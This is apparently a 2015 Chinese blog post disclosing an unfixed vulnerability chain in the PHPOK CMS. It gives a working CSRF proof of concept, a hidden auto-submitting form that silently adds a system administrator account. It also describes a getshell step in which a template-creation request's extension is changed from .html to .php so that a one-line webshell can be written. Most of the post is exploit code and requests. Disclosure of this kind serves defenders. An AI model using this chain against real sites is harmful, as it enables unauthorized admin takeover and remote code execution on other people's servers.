phpok csrf添加管理员+后台getshell

时间:2015-2-8    作者:admin    分类: 技术交流


老问题,一直没修复。

poc:

code 区域
<div style="display:none">

<form action="http://localhost/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post">

<input type="hidden" name="id" value=""/>

<input type="hidden" name="account" value=""/>

<input type="hidden" name="pass" value=""/>

<input type="hidden" name="email" value=""/>

<input type="hidden" name="status" value=""/>

<input type="hidden" name="if_system" value=""/>

<input type="submit" name="up" value="submit"/>

</form>

<script>

var t = document.poc;

t.account.value="wooyun";

t.pass.value="123456";

t.status.value="1";

t.if_system.value="1";

document.poc.submit();

</script>

</div>


QQ截图20150114173941.png





访问poc后

QQ截图20150114174011.png





Getshell:

风格管理-创建模板文件

默认这里只能添加html文件。但是可以绕过

QQ截图20150114174536.png



code 区域
GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.html



修改成

code 区域
GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.php


QQ截图20150114174709.png



然后在编辑文件写入一句话木马就OK了。

标签: CSRF phpok getshell